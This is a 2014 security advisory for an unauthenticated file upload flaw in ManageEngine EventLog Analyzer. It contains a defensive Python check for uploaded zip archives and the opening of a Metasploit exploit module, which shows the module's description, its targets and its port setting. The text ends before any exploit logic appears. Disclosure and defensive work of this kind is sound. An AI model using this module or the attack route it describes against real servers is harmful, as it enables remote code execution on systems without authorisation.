Published: 2014-08-31
Updated: 2014-09-03
Affected systems:
ManageEngine EventLog Analyzer 9.9 Build 9002
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69482
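ManageEngine EventLog Analyzer is IT compliance and event log management software.
EventLog Analyzer 9.9 Build 9002 and other versions contain an arbitrary file upload vulnerability and an unauthorized access vulnerability in their implementation. An attacker can exploit these vulnerabilities to execute arbitrary code and gain unauthorized access to the application.
<*Source: h0ng10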
*>
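The module description further down this page says the agentUpload servlet accepts unauthenticated uploads and handles zip contents insecurely, with EAR deployment and JSP upload as the two routes to code execution. The following is an added example, not code from the advisory, the module or the vendor: a Python check that audits an uploaded archive before anything is extracted, assuming the insecure handling is trust in entry names and types (the page does not say which). `audit_upload`, `make_zip`, the suffix list and the size cap are hypothetical names and values.

```python
import io
import posixpath
import zipfile

# Types the server would deploy or execute if they reached a web root
# (the module description names EAR deployment and JSP upload).
BLOCKED_SUFFIXES = (".jsp", ".jspx", ".ear", ".war")
MAX_TOTAL_BYTES = 50 * 1024 * 1024  # assumed cap on uncompressed size


def audit_upload(zip_bytes, max_total=MAX_TOTAL_BYTES):
    """Return a list of (entry_name, reason) findings; empty means acceptable."""
    findings = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Normalise separators so Windows-style names are checked too.
            name = info.filename.replace("\\", "/")
            norm = posixpath.normpath(name)
            if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
                findings.append((info.filename, "absolute path"))
            elif norm == ".." or norm.startswith("../"):
                findings.append((info.filename, "escapes extraction directory"))
            if norm.lower().endswith(BLOCKED_SUFFIXES):
                findings.append((info.filename, "deployable or executable type"))
            total += info.file_size
    if total > max_total:
        findings.append(("<archive>", "uncompressed size over limit"))
    return findings


def make_zip(names):
    """Build a constructed in-memory archive for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, b"sample")
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples: one benign archive, one that should be rejected.
    for names in (["agent/data.log"], ["../../outside.txt", "logs/page.JSP"]):
        print(names, "->", audit_upload(make_zip(names)))
```

This covers only the archive handling; the upload endpoint also has to require an authenticated session, since the page lists unauthenticated access as the second weakness.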
Test method:
--------------------------------------------------------------------------------
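Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!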
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
        The vulnerability exists in the agentUpload servlet which accepts unauthenticated
        file uploads and handles zip file contents in an insecure way. By combining both
        weaknesses a remote attacker can achieve remote code execution. This module has been
        tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
        between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
        while versions 8.1+ are only exploitable via a JSP upload.
      },
      'Author' =>
        [
          'h0ng10',
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Privileged' => false, # Privileged on Windows but not on Linux targets
      'Platform' => %w{ java linux win },
      'Targets' =>
        [
          [ 'Automatic', { } ],
          [ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA,
              'WfsDelay' => 30
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Aug 31 2014'))

    register_options(
      [
        Opt::RPORT(8400),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
      ], self.class)
  end